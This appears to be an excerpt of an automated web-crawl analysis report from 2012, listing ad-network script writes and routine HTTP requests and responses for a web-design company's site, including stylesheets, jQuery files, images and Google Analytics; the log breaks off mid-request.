<style>#lwp_ad_item_premium_95029{	display:none;	position:relative;	width:300px;}#lwp_ad_item_premium_95029>div{}#lwp_adchoices_95029{	display:none;	position:absolute;	right:0px;	top:0px;	z-index:1;	background-color:transparent;	height:16px;	overflow:none;}#lwp_adchoices_95029 img{	border:0px;}</style><div id="lwp_abf_95029"></div><div id="lwp_ad_item_premium_95029"><div><script type='text/javascript' src='http://apr.lijit.com///www/delivery/ajs.php?zoneid=95029&amp;username=bloguin&amp;numAds=1&amp;premium=1&amp;eleid=lijit_region_95029&amp;abf=true&amp;tid=95029_1353298662292da37f36c0459&amp;lijit_kw=&amp;cb=70093576076&amp;flv=10.0.45&amp;time=05:17:42&amp;ifr=1&amp;loc=http%3A%2F%2Ffenwaywest.com%2Fmedia%2Findex.php&amp;od=fenwaywest.com&amp;referer=http%3A%2F%2Ffenwaywest.com%2Fmedia%2Findex.php'></script></div></div><script type='text/javascript'>LJT_Ads.init(); LJT_Ads.fixBeacons(document.body);</script>

#107 JavaScript::Write (size: 924, repeated: 1)

<style>#lwp_ad_item_premium_95032{	display:none;	position:relative;	width:160px;}#lwp_ad_item_premium_95032>div{}#lwp_adchoices_95032{	display:none;	position:absolute;	right:0px;	top:0px;	z-index:1;	background-color:transparent;	height:16px;	overflow:none;}#lwp_adchoices_95032 img{	border:0px;}</style><div id="lwp_abf_95032"></div><div id="lwp_ad_item_premium_95032"><div><script type='text/javascript' src='http://apr.lijit.com///www/delivery/ajs.php?zoneid=95032&amp;username=bloguin&amp;numAds=1&amp;premium=1&amp;eleid=lijit_region_95032&amp;abf=true&amp;tid=95032_1353298658273e3751f284eda&amp;lijit_kw=&amp;cb=24722688839&amp;flv=10.0.45&amp;time=05:17:38&amp;ifr=1&amp;loc=http%3A%2F%2Ffenwaywest.com%2Fmedia%2Findex.php&amp;od=fenwaywest.com&amp;referer=http%3A%2F%2Ffenwaywest.com%2Fmedia%2Findex.php'></script></div></div><script type='text/javascript'>LJT_Ads.init(); LJT_Ads.fixBeacons(document.body);</script>

#108 JavaScript::Write (size: 65, repeated: 1)

NTPT_PGEXTRA = 'site=9859_fenway_west&account=yardbarkernetwork';

#109 JavaScript::Write (size: 29, repeated: 1)

labels:'FenwayWest.AllSports'

#110 JavaScript::Write (size: 24, repeated: 1)

qacct:'p-a3g2Mplggde4A',

#111 JavaScript::Write (size: 2, repeated: 1)

};


HTTP Transactions (427)


Request Response
GET /index.php?website-design-and-development-services-web-company=seo HTTP/1.1

Host: www.88websitedesign.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
HTTP/1.1 200 OK

Content-Type: text/html
Date: Mon, 19 Nov 2012 04:17:30 GMT
Server: Apache
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 4880
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
GET /style/style.css HTTP/1.1

Host: www.88websitedesign.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.88websitedesign.com/index.php?website-design-and-development-services-web-company=seo
HTTP/1.1 200 OK

Content-Type: text/css
Date: Mon, 19 Nov 2012 04:17:31 GMT
Server: Apache
Last-Modified: Mon, 11 Jun 2012 10:04:47 GMT
Etag: &quot;4005a45-401b-4c22f7add8f07&quot;
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 2930
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
GET /js/execute.js HTTP/1.1

Host: www.88websitedesign.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.88websitedesign.com/index.php?website-design-and-development-services-web-company=seo
HTTP/1.1 200 OK

Content-Type: application/javascript
Date: Mon, 19 Nov 2012 04:17:31 GMT
Server: Apache
Last-Modified: Wed, 10 Oct 2012 03:24:04 GMT
Etag: &quot;1590650-4c1-4cbabfc9140ef&quot;
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 551
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
GET /images/favicon.gif HTTP/1.1

Host: www.88websitedesign.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
HTTP/1.1 200 OK

Content-Type: image/gif
Date: Mon, 19 Nov 2012 04:17:31 GMT
Server: Apache
Last-Modified: Mon, 11 Jun 2012 10:07:05 GMT
Etag: &quot;4bc959b-46b-4c22f8313ff1a&quot;
Accept-Ranges: bytes
Content-Length: 1131
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
GET /js/slide/stepcarousel.js HTTP/1.1

Host: www.88websitedesign.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.88websitedesign.com/index.php?website-design-and-development-services-web-company=seo
HTTP/1.1 200 OK

Content-Type: application/javascript
Date: Mon, 19 Nov 2012 04:17:31 GMT
Server: Apache
Last-Modified: Wed, 10 Oct 2012 03:24:19 GMT
Etag: &quot;311efbb-3ca8-4cbabfd7f1ae6&quot;
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 4772
Keep-Alive: timeout=5, max=98
Connection: Keep-Alive
GET /js/jquery-ui-1.7.1.custom.min.js HTTP/1.1

Host: www.88websitedesign.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.88websitedesign.com/index.php?website-design-and-development-services-web-company=seo
HTTP/1.1 200 OK

Content-Type: application/javascript
Date: Mon, 19 Nov 2012 04:17:31 GMT
Server: Apache
Last-Modified: Wed, 10 Oct 2012 03:24:10 GMT
Etag: &quot;1590653-20d7-4cbabfcf1f0f6&quot;
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 3179
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
GET /js/jquery-1.3.2.min.js HTTP/1.1

Host: www.88websitedesign.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.88websitedesign.com/index.php?website-design-and-development-services-web-company=seo
HTTP/1.1 200 OK

Content-Type: application/javascript
Date: Mon, 19 Nov 2012 04:17:31 GMT
Server: Apache
Last-Modified: Wed, 10 Oct 2012 03:24:08 GMT
Etag: &quot;1590652-e0d5-4cbabfcd59bb4&quot;
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 19883
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
GET /js/slide/jquery-1.2.6.pack.js HTTP/1.1

Host: www.88websitedesign.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.88websitedesign.com/index.php?website-design-and-development-services-web-company=seo
HTTP/1.1 200 OK

Content-Type: application/javascript
Date: Mon, 19 Nov 2012 04:17:31 GMT
Server: Apache
Last-Modified: Wed, 10 Oct 2012 03:24:17 GMT
Etag: &quot;311efba-7a68-4cbabfd65bb5c&quot;
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 15810
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
GET /images/logo.jpg HTTP/1.1

Host: www.88websitedesign.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.88websitedesign.com/index.php?website-design-and-development-services-web-company=seo
HTTP/1.1 200 OK

Content-Type: image/jpeg
Date: Mon, 19 Nov 2012 04:17:31 GMT
Server: Apache
Last-Modified: Mon, 11 Jun 2012 10:07:36 GMT
Etag: &quot;5ca3403-6215-4c22f84f7f7e3&quot;
Accept-Ranges: bytes
Content-Length: 25109
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
GET /ga.js HTTP/1.1

Host: www.google-analytics.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.88websitedesign.com/index.php?website-design-and-development-services-web-company=seo
If-Modified-Since: Wed, 19 Sep 2012 11:51:40 GMT
HTTP/1.1 200 OK

Content-Type: text/javascript
Content-Length: 14948
Content-Encoding: gzip
Last-Modified: Wed, 07 Nov 2012 22:33:51 GMT
X-Content-Type-Options: nosniff, nosniff
Date: Mon, 19 Nov 2012 00:18:49 GMT
Expires: Mon, 19 Nov 2012 12:18:49 GMT
Vary: Accept-Encoding
Age: 14322
Cache-Control: max-age=43200, public
Server: GFE/2.0
GET /__utm.gif?utmwv=5.3.8&utms=1&utmn=218040092&utmhn=www.88websitedesign.com&utmcs=ISO-8859-1&utmsr=1176x885&utmvp=1159x778&utmsc=24-bit&utmul=en-us&utmje=1&utmfl=10.0%20r45&utmdt=Website%20Design%20%7C%20Affordable%20Best%20Low%20Cost%20%7C%20Small%20Web%20Design%20Services%20%7C%20Professional%20Web%20Development%20India&utmhid=1589248212&utmr=-&utmp=%2Findex.php%3Fwebsite-design-and-development-services-web-company%3Dseo&utmac=UA-8933222-3&utmcc=__utma%3D252187008.669848676.1353298652.1353298652.1353298652.1%3B%2B__utmz%3D252187008.1353298652.1.1.utmcsr%3D(direct)%7Cutmccn%3D(direct)%7Cutmcmd%3D(none)%3B&utmu=D~ HTTP/1.1

Host: www.google-analytics.com
GET /__utm.gif?utmwv=5.3.8&amp;utms=1&amp;utmn=218040092&amp;utmhn=www.88websitedesign.com&amp;utmcs=ISO-8859-1&amp;utmsr=1176x885&amp;utmvp=1159x778&amp;utmsc=24-bit&amp;utmul=en-us&amp;utmje=1&amp;utmfl=10.0%20r45&amp;utmdt=Website%20Design%20%7C%20Affordable%20Best%20Low%20Cost%20%7C%20Small%20Web%20Design%20Services%20%7C%20Professional%20Web%20Development%20India&amp;utmhid=1589248212&amp;utmr=-&amp;utmp=%2Findex.php%3Fwebsite-design-and-development-services-web-company%3Dseo&amp;utmac=UA-8933222-3&amp;utmcc=__utma%3D252187008.669848676.1353298652.1353298652.1353298652.1%3B%2B__utmz%3D252187008.1353298652.1.1.utmcsr%3D(direct)%7Cutmccn%3D(direct)%7Cutmcmd%3D(none)%3B&amp;utmu=D~ HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.88websitedesign.com/index.php?website-design-and-development-services-web-company=seo
HTTP/1.1 200 OK

Content-Type: image/gif
Date: Fri, 16 Nov 2012 12:18:43 GMT
Content-Length: 35
X-Content-Type-Options: nosniff
Pragma: no-cache
Expires: Wed, 19 Apr 2000 11:43:00 GMT
Last-Modified: Wed, 21 Jan 2004 19:51:30 GMT
Cache-Control: private, no-cache, no-cache=Set-Cookie, proxy-revalidate
Age: 230329
Server: GFE/2.0
GET /images/slideshow/banner-2.jpg HTTP/1.1

Host: www.88websitedesign.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.88websitedesign.com/index.php?website-design-and-development-services-web-company=seo
HTTP/1.1 200 OK

Content-Type: image/jpeg
Date: Mon, 19 Nov 2012 04:17:31 GMT
Server: Apache
Last-Modified: Mon, 11 Jun 2012 10:09:22 GMT
Etag: &quot;4d9053b-1782d-4c22f8b4114f7&quot;
Accept-Ranges: bytes
Content-Length: 96301
Keep-Alive: timeout=5, max=97
Connection: Keep-Alive
GET /images/slideshow/banner-4.jpg HTTP/1.1

Host: www.88websitedesign.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.88websitedesign.com/index.php?website-design-and-development-services-web-company=seo
HTTP/1.1 200 OK

Content-Type: image/jpeg
Date: Mon, 19 Nov 2012 04:17:31 GMT
Server: Apache
Last-Modified: Mon, 11 Jun 2012 10:09:28 GMT
Etag: &quot;4d9053d-1b17b-4c22f8ba54b85&quot;
Accept-Ranges: bytes
Content-Length: 110971
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
GET /images/slideshow/banner-3.jpg HTTP/1.1

Host: www.88websitedesign.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.88websitedesign.com/index.php?website-design-and-development-services-web-company=seo
HTTP/1.1 200 OK

Content-Type: image/jpeg
Date: Mon, 19 Nov 2012 04:17:31 GMT
Server: Apache
Last-Modified: Mon, 11 Jun 2012 10:09:25 GMT
Etag: &quot;4d9053c-1ac06-4c22f8b7416d5&quot;
Accept-Ranges: bytes
Content-Length: 109574
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
GET /images/slideshow/banner-6.jpg HTTP/1.1

Host: www.88websitedesign.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.88websitedesign.com/index.php?website-design-and-development-services-web-company=seo
HTTP/1.1 200 OK

Content-Type: image/jpeg
Date: Mon, 19 Nov 2012 04:17:31 GMT
Server: Apache
Last-Modified: Mon, 11 Jun 2012 10:09:35 GMT
Etag: &quot;4d9053f-1add5-4c22f8c0fabbd&quot;
Accept-Ranges: bytes
Content-Length: 110037
Keep-Alive: timeout=5, max=98
Connection: Keep-Alive
GET /images/slideshow/banner-5.jpg HTTP/1.1

Host: www.88websitedesign.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.88websitedesign.com/index.php?website-design-and-development-services-web-company=seo
HTTP/1.1 200 OK

Content-Type: image/jpeg
Date: Mon, 19 Nov 2012 04:17:31 GMT
Server: Apache
Last-Modified: Mon, 11 Jun 2012 10:09:32 GMT
Etag: &quot;4d9053e-2106f-4c22f8bdeffa2&quot;
Accept-Ranges: bytes
Content-Length: 135279
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
GET /images/slideshow/banner-1.jpg HTTP/1.1

Host: www.88websitedesign.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.88websitedesign.com/index.php?website-design-and-development-services-web-company=seo
HTTP/1.1 200 OK

Content-Type: image/jpeg
Date: Mon, 19 Nov 2012 04:17:31 GMT
Server: Apache
Last-Modified: Mon, 11 Jun 2012 10:09:19 GMT
Etag: &quot;4d9053a-31a9e-4c22f8b13d3e8&quot;
Accept-Ranges: bytes
Content-Length: 203422
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
GET /images/icon-1.jpg HTTP/1.1

Host: www.88websitedesign.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.88websitedesign.com/index.php?website-design-and-development-services-web-company=seo
HTTP/1.1 200 OK

Content-Type: image/jpeg
Date: Mon, 19 Nov 2012 04:17:32 GMT
Server: Apache
Last-Modified: Mon, 11 Jun 2012 10:07:20 GMT
Etag: &quot;4bc95a8-1a4d-4c22f83fd58bc&quot;
Accept-Ranges: bytes
Content-Length: 6733
Keep-Alive: timeout=5, max=97
Connection: Keep-Alive
GET /images/icon-3.jpg HTTP/1.1

Host: www.88websitedesign.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.88websitedesign.com/index.php?website-design-and-development-services-web-company=seo
HTTP/1.1 200 OK

Content-Type: image/jpeg
Date: Mon, 19 Nov 2012 04:17:32 GMT
Server: Apache
Last-Modified: Mon, 11 Jun 2012 10:07:22 GMT
Etag: &quot;4bc95aa-1d35-4c22f8422b27e&quot;
Accept-Ranges: bytes
Content-Length: 7477
Keep-Alive: timeout=5, max=98
Connection: Keep-Alive
GET /images/icon-4.jpg HTTP/1.1

Host: www.88websitedesign.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.88websitedesign.com/index.php?website-design-and-development-services-web-company=seo
HTTP/1.1 200 OK

Content-Type: image/jpeg
Date: Mon, 19 Nov 2012 04:17:32 GMT
Server: Apache
Last-Modified: Mon, 11 Jun 2012 10:07:24 GMT
Etag: &quot;4bc95ab-1955-4c22f84358e4a&quot;
Accept-Ranges: bytes
Content-Length: 6485
Keep-Alive: timeout=5, max=96
Connection: Keep-Alive
GET /images/slideshow/banner-7.jpg HTTP/1.1

Host: www.88websitedesign.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.88websitedesign.com/index.php?website-design-and-development-services-web-company=seo
HTTP/1.1 200 OK

Content-Type: image/jpeg
Date: Mon, 19 Nov 2012 04:17:32 GMT
Server: Apache
Last-Modified: Mon, 11 Jun 2012 10:09:39 GMT
Etag: &quot;4d90540-20947-4c22f8c494c70&quot;
Accept-Ranges: bytes
Content-Length: 133447
Keep-Alive: timeout=5, max=96
Connection: Keep-Alive
GET /images/slideshow/banner-8.jpg HTTP/1.1

Host: www.88websitedesign.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.88websitedesign.com/index.php?website-design-and-development-services-web-company=seo
HTTP/1.1 200 OK

Content-Type: image/jpeg
Date: Mon, 19 Nov 2012 04:17:32 GMT
Server: Apache
Last-Modified: Mon, 11 Jun 2012 10:09:44 GMT
Etag: &quot;4d90541-2959d-4c22f8c8d5caf&quot;
Accept-Ranges: bytes
Content-Length: 169373
Keep-Alive: timeout=5, max=98
Connection: Keep-Alive
GET /images/a.jpg HTTP/1.1

Host: www.88websitedesign.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.88websitedesign.com/index.php?website-design-and-development-services-web-company=seo
HTTP/1.1 200 OK

Content-Type: image/jpeg
Date: Mon, 19 Nov 2012 04:17:33 GMT
Server: Apache
Last-Modified: Mon, 11 Jun 2012 10:06:11 GMT
Etag: &quot;10ce0fc-7f2-4c22f7fe05f7d&quot;
Accept-Ranges: bytes
Content-Length: 2034
Keep-Alive: timeout=5, max=97
Connection: Keep-Alive
GET /images/icon-2.jpg HTTP/1.1

Host: www.88websitedesign.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.88websitedesign.com/index.php?website-design-and-development-services-web-company=seo
HTTP/1.1 200 OK

Content-Type: image/jpeg
Date: Mon, 19 Nov 2012 04:17:32 GMT
Server: Apache
Last-Modified: Mon, 11 Jun 2012 10:07:21 GMT
Etag: &quot;4bc95a9-203c-4c22f840ff618&quot;
Accept-Ranges: bytes
Content-Length: 8252
Keep-Alive: timeout=5, max=98
Connection: Keep-Alive
GET /images/b.jpg HTTP/1.1

Host: www.88websitedesign.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.88websitedesign.com/index.php?website-design-and-development-services-web-company=seo
HTTP/1.1 200 OK

Content-Type: image/jpeg
Date: Mon, 19 Nov 2012 04:17:33 GMT
Server: Apache
Last-Modified: Mon, 11 Jun 2012 10:06:22 GMT
Etag: &quot;55e75aa-7b4-4c22f808a964e&quot;
Accept-Ranges: bytes
Content-Length: 1972
Keep-Alive: timeout=5, max=95
Connection: Keep-Alive
GET /images/c.jpg HTTP/1.1

Host: www.88websitedesign.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.88websitedesign.com/index.php?website-design-and-development-services-web-company=seo
HTTP/1.1 200 OK

Content-Type: image/jpeg
Date: Mon, 19 Nov 2012 04:17:33 GMT
Server: Apache
Last-Modified: Mon, 11 Jun 2012 10:06:56 GMT
Etag: &quot;55e75b5-7ad-4c22f82925675&quot;
Accept-Ranges: bytes
Content-Length: 1965
Keep-Alive: timeout=5, max=95
Connection: Keep-Alive
GET /images/slideshow/banner-9.jpg HTTP/1.1

Host: www.88websitedesign.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.88websitedesign.com/index.php?website-design-and-development-services-web-company=seo
HTTP/1.1 200 OK

Content-Type: image/jpeg
Date: Mon, 19 Nov 2012 04:17:32 GMT
Server: Apache
Last-Modified: Mon, 11 Jun 2012 10:09:48 GMT
Etag: &quot;4d90542-2bb15-4c22f8cd30f44&quot;
Accept-Ranges: bytes
Content-Length: 178965
Keep-Alive: timeout=5, max=98
Connection: Keep-Alive
GET /images/d.jpg HTTP/1.1

Host: www.88websitedesign.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.88websitedesign.com/index.php?website-design-and-development-services-web-company=seo
HTTP/1.1 200 OK

Content-Type: image/jpeg
Date: Mon, 19 Nov 2012 04:17:33 GMT
Server: Apache
Last-Modified: Mon, 11 Jun 2012 10:07:00 GMT
Etag: &quot;55e75b8-795-4c22f82caf56b&quot;
Accept-Ranges: bytes
Content-Length: 1941
Keep-Alive: timeout=5, max=97
Connection: Keep-Alive
GET /images/e.jpg HTTP/1.1

Host: www.88websitedesign.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.88websitedesign.com/index.php?website-design-and-development-services-web-company=seo
HTTP/1.1 200 OK

Content-Type: image/jpeg
Date: Mon, 19 Nov 2012 04:17:33 GMT
Server: Apache
Last-Modified: Mon, 11 Jun 2012 10:07:02 GMT
Etag: &quot;385580f-76d-4c22f82eab5aa&quot;
Accept-Ranges: bytes
Content-Length: 1901
Keep-Alive: timeout=5, max=96
Connection: Keep-Alive
GET /images/f.jpg HTTP/1.1

Host: www.88websitedesign.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
